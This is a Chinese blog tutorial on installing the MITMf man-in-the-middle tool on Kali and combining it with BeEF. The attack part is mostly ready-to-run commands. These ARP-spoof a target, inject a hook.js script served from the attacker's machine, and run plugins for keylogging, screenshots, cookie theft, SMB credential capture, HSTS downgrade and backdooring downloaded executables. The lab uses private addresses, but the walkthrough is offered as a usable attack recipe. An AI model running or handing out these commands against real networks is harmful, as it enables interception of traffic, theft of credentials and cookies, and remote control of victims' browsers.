中间人攻击工具mitmf(另类的XSS注入攻击)
中间人攻击工具mitmf(另类的XSS注入攻击)
(一)简介
(二)安装
(三)结合beef使用
(一)简介
Mitmf 是一款用来进行中间人攻击的工具。它可以结合 beef 一起来使用,并利用 beef 强大的 hook 脚本来控制目标客户端。下面让我们一起看看如何在 Kali2.0上安装使用 Mitmf 。默认在2.0上并未安装,在之前的版本有安装。
(二)安装
(1)安装环境
1 | apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file |
(2)安装 mitmf
1 | apt-get install mitmf |
(3)卸载旧版的twisted
1 | pip uninstall Twisted |
(4)下载合适的twisted
1 | wget http: //twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2 |
(5)安装 twisted
1 | pip install ./Twisted-15.5.0.tar.bz2 |
(三)结合beef使用
(1)启动beef
(2)打开beef的ui界面
访问 127.0.0.1:3000/ui/panel
(3)利用mitmf进行中间人XSS攻击
攻击者ip:192.168.14.157
虚拟机ip:192.168.14.158
网关:192.168.14.2
1 | mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --inject --js-url http: //192.168.14.157:3000/hook.js |
(4)查看欺骗是否成功
(5)注入XSS代码
只要用户对任何网站进行对应访问,访问页面中就被插入js代码
接下来就可以使用beef进行对应控制
受害者电脑上访问任意站点
现在我们查看网站源代码,发现被注入了代码
在beef界面上也有了被hook的主机
双击被hook的主机就可以看到详细信息
然后就可以使用beef的各种模块进行更多的测试了
(6)更多使用
查看更多功能
1 | mitmf -h |
键盘记录器
1 | mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --jskeylogger |
倒置图片
1 | mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --upsidedownterne |
截屏(默认截图保存在/var/log/mitmf,每十秒截屏一次)
1 | mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --screen |
抓取cookie信息
1 | mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --ferretng |
检测客户端浏览器及插件信息
1 | mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --browserprofiler |
获取smb密码
1 | mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --smbtrap |
1 | mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --smbauth |
降级hsts攻击
HTTP strict Transport Security
防止协议降级、cookie窃取
安全策略通过HTTP响应头 "HTTP strict Transport Security"实施
限制user-agent、https等
1 | mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --hsts |
凌空插后门
需要结合metsploit使用
对传输过程的exe中插入后门,并不是每一个exe程序都能插入后门
1 | mitmf --spoof --arp -i eth0 --gateway 192.168.14.2 --target 192.168.14.158 --filepwn |
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· 三行代码完成国际化适配,妙~啊~
· .NET Core 中如何实现缓存的预热?